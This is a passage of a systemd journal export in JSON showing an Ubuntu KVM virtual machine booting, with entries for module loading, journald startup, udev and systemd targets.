+AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d4;b=e2b08827b5804427b422c10c84f1567e;m=57742b;t=5bd16dd1af393;x=61db57ed35ef3db6", "__REALTIME_TIMESTAMP" : "1615280780014483", "__MONOTONIC_TIMESTAMP" : "5731371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4838029", "MESSAGE" : "Detected virtualization kvm." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d5;b=e2b08827b5804427b422c10c84f1567e;m=57743b;t=5bd16dd1af3a3;x=6cad4666b4b66f5a", "__REALTIME_TIMESTAMP" : "1615280780014499", "__MONOTONIC_TIMESTAMP" : "5731387", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4840668", "MESSAGE" : "Detected architecture x86-64." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d6;b=e2b08827b5804427b422c10c84f1567e;m=577448;t=5bd16dd1af3b0;x=7d956334ef22c29d", "__REALTIME_TIMESTAMP" : "1615280780014512", "__MONOTONIC_TIMESTAMP" : "5731400", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4855210", "MESSAGE" : "Set hostname to ." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d7;b=e2b08827b5804427b422c10c84f1567e;m=577455;t=5bd16dd1af3bc;x=cc15926571e6ef3b", "__REALTIME_TIMESTAMP" : "1615280780014524", "__MONOTONIC_TIMESTAMP" : "5731413", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4870328", "MESSAGE" : "Initializing machine ID from KVM UUID." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d8;b=e2b08827b5804427b422c10c84f1567e;m=577461;t=5bd16dd1af3c9;x=601f89e0a8d6d00d", "__REALTIME_TIMESTAMP" : "1615280780014537", "__MONOTONIC_TIMESTAMP" : "5731425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4874166", "MESSAGE" : "Installed transient /etc/machine-id file." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d9;b=e2b08827b5804427b422c10c84f1567e;m=57746f;t=5bd16dd1af3d6;x=17ecf4b5c6f614fc", "__REALTIME_TIMESTAMP" : "1615280780014550", "__MONOTONIC_TIMESTAMP" : "5731439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5338460", "MESSAGE" : "Reached target Swap." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1da;b=e2b08827b5804427b422c10c84f1567e;m=57747b;t=5bd16dd1af3e3;x=c8c921c7a0c85d5a", "__REALTIME_TIMESTAMP" : "1615280780014563", "__MONOTONIC_TIMESTAMP" : "5731451", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5343107", "MESSAGE" : "Reached target User and Group Name Lookups." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1db;b=e2b08827b5804427b422c10c84f1567e;m=577487;t=5bd16dd1af3ef;x=f8a48c4940b6d242", "__REALTIME_TIMESTAMP" : "1615280780014575", "__MONOTONIC_TIMESTAMP" : "5731463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5349139", "MESSAGE" : "Set up automount Arbitrary Executable File Formats File System Automount Point." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dc;b=e2b08827b5804427b422c10c84f1567e;m=577494;t=5bd16dd1af3fc;x=fc4678ab1b81a329", "__REALTIME_TIMESTAMP" : "1615280780014588", "__MONOTONIC_TIMESTAMP" : "5731476", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5356839", "MESSAGE" : "Created slice User and Session Slice." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dd;b=e2b08827b5804427b422c10c84f1567e;m=5774a1;t=5bd16dd1af408;x=ae62b745ca058a1c", "__REALTIME_TIMESTAMP" : "1615280780014600", "__MONOTONIC_TIMESTAMP" : "5731489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5488210", "MESSAGE" : "Loading iSCSI transport class v2.0-870." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1de;b=e2b08827b5804427b422c10c84f1567e;m=5774b0;t=5bd16dd1af417;x=e7e376182de3d387", "__REALTIME_TIMESTAMP" : "1615280780014615", "__MONOTONIC_TIMESTAMP" : "5731504", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5499236", "MESSAGE" : "EXT4-fs (vda1): re-mounted. Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1df;b=e2b08827b5804427b422c10c84f1567e;m=5774cb;t=5bd16dd1af432;x=4ecfa34b7065c656", "__REALTIME_TIMESTAMP" : "1615280780014642", "__MONOTONIC_TIMESTAMP" : "5731531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5568633", "MESSAGE" : "iscsi: registered transport (tcp)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e0;b=e2b08827b5804427b422c10c84f1567e;m=5774e5;t=5bd16dd1af44d;x=c88a5b30d8b3d7fc", "__REALTIME_TIMESTAMP" : "1615280780014669", "__MONOTONIC_TIMESTAMP" : "5731557", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5685927", "MESSAGE" : "iscsi: registered transport (iser)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e1;b=e2b08827b5804427b422c10c84f1567e;m=5774fc;t=5bd16dd1af463;x=bb4e6f9bf0d1357c", "__REALTIME_TIMESTAMP" : "1615280780014691", "__MONOTONIC_TIMESTAMP" : "5731580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 
"SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "MESSAGE_ID" : "f77379a8490b408bbe5f6940505a777b", "MESSAGE" : "Journal started", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e2;b=e2b08827b5804427b422c10c84f1567e;m=579b80;t=5bd16dd1b1ae7;x=708a9f50f5affdb4", "__REALTIME_TIMESTAMP" : "1615280780024551", "__MONOTONIC_TIMESTAMP" : "5741440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "Runtime journal (/run/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 2.4M, max 19.9M, 17.4M free.", "JOURNAL_NAME" : "Runtime journal", "JOURNAL_PATH" : "/run/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "2613248", "CURRENT_USE_PRETTY" : "2.4M", "MAX_USE" : "20905984", "MAX_USE_PRETTY" : "19.9M", "DISK_KEEP_FREE" : "31358976", "DISK_KEEP_FREE_PRETTY" : "29.9M", "DISK_AVAILABLE" : "206270464", 
"DISK_AVAILABLE_PRETTY" : "196.7M", "LIMIT" : "20905984", "LIMIT_PRETTY" : "19.9M", "AVAILABLE" : "18292736", "AVAILABLE_PRETTY" : "17.4M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e3;b=e2b08827b5804427b422c10c84f1567e;m=57aad6;t=5bd16dd1b2a3e;x=60e7c652e0bd7c0d", "__REALTIME_TIMESTAMP" : "1615280780028478", "__MONOTONIC_TIMESTAMP" : "5745366", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "MESSAGE" : "Inserted module 'iscsi_tcp'", "_TRANSPORT" : "journal", "_PID" : "373", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780028525" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e4;b=e2b08827b5804427b422c10c84f1567e;m=57aed7;t=5bd16dd1b2e3f;x=b97ccb0c58724824", "__REALTIME_TIMESTAMP" : "1615280780029503", "__MONOTONIC_TIMESTAMP" : "5746391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "_TRANSPORT" : "journal", "_PID" : "373", "MESSAGE" : "Inserted module 'ib_iser'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280779979585" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e5;b=e2b08827b5804427b422c10c84f1567e;m=57ced3;t=5bd16dd1b4e3a;x=4b62473704db743c", "__REALTIME_TIMESTAMP" : "1615280780037690", "__MONOTONIC_TIMESTAMP" : "5754579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", 
"_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE" : "Starting Flush Journal to Persistent Storage...", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780029943" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e6;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=1d9ee251b5cd373d", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE" : "Time spent on flushing to /var is 3.314ms for 485 entries." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e7;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=f04395007d153097", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "System journal (/var/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 8.0M, max 200.9M, 192.9M free.", "JOURNAL_NAME" : "System journal", "JOURNAL_PATH" : "/var/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "8388608", "CURRENT_USE_PRETTY" : "8.0M", "MAX_USE" : "210751488", "MAX_USE_PRETTY" : "200.9M", "DISK_KEEP_FREE" : "316125184", "DISK_KEEP_FREE_PRETTY" : "301.4M", "DISK_AVAILABLE" : "1075249152", "DISK_AVAILABLE_PRETTY" : "1.0G", "LIMIT" : "210751488", "LIMIT_PRETTY" : "200.9M", "AVAILABLE" : "202362880", "AVAILABLE_PRETTY" : "192.9M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e8;b=e2b08827b5804427b422c10c84f1567e;m=588647;t=5bd16dd1c05ae;x=85e75afcf7a90cd2", "__REALTIME_TIMESTAMP" : "1615280780084654", "__MONOTONIC_TIMESTAMP" : "5801543", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : 
"unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "MESSAGE" : "Started udev Kernel Device Manager.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "UNIT" : "systemd-udevd.service", "INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780055025" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e9;b=e2b08827b5804427b422c10c84f1567e;m=5887ca;t=5bd16dd1c0731;x=e3fc14ea025d4465", "__REALTIME_TIMESTAMP" : "1615280780085041", "__MONOTONIC_TIMESTAMP" : "5801930", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Apply Kernel Variables.", "UNIT" : "systemd-sysctl.service", "INVOCATION_ID" : "6b6fa8b7e34c4a8a9469dc4e7cc56602", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780061690" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ea;b=e2b08827b5804427b422c10c84f1567e;m=58cff4;t=5bd16dd1c4f5c;x=a385b718ba0d78cb", "__REALTIME_TIMESTAMP" : "1615280780103516", "__MONOTONIC_TIMESTAMP" : "5820404", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Flush Journal to Persistent Storage.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780100979" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1eb;b=e2b08827b5804427b422c10c84f1567e;m=592a7b;t=5bd16dd1ca9e2;x=7bf11fd8fad12c74", "__REALTIME_TIMESTAMP" : "1615280780126690", "__MONOTONIC_TIMESTAMP" : "5843579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started udev Coldplug all Devices.", "UNIT" : "systemd-udev-trigger.service", "INVOCATION_ID" : "880103d45fc6499fa0bf439eb2b31545", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280780124301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ec;b=e2b08827b5804427b422c10c84f1567e;m=596db5;t=5bd16dd1ced1c;x=2ce32247415e65b0", "__REALTIME_TIMESTAMP" : "1615280780143900", "__MONOTONIC_TIMESTAMP" : "5860789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Set the console keyboard layout.", "UNIT" : "keyboard-setup.service", "INVOCATION_ID" : "88391c49fb4a4866b11a14cff32627b9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780141400" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ed;b=e2b08827b5804427b422c10c84f1567e;m=598031;t=5bd16dd1cff98;x=288e5cb33d396f96", "__REALTIME_TIMESTAMP" : "1615280780148632", "__MONOTONIC_TIMESTAMP" : "5865521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : 
"job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Dispatch Password Requests to Console Directory Watch.", "UNIT" : "systemd-ask-password-console.path", "INVOCATION_ID" : "5b12b92bcd6f4700a8056df2d51f2500", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780145529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ee;b=e2b08827b5804427b422c10c84f1567e;m=599744;t=5bd16dd1d16ac;x=743f8dae205b830a", "__REALTIME_TIMESTAMP" : "1615280780154540", "__MONOTONIC_TIMESTAMP" : "5871428", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local Encrypted Volumes.", "UNIT" : "cryptsetup.target", "INVOCATION_ID" : "e167c4ac112d4163b1132569ae1999dc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780151879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ef;b=e2b08827b5804427b422c10c84f1567e;m=59b0da;t=5bd16dd1d3041;x=3b7b8b0d01bd86dd", "__REALTIME_TIMESTAMP" : "1615280780161089", "__MONOTONIC_TIMESTAMP" : "5877978", 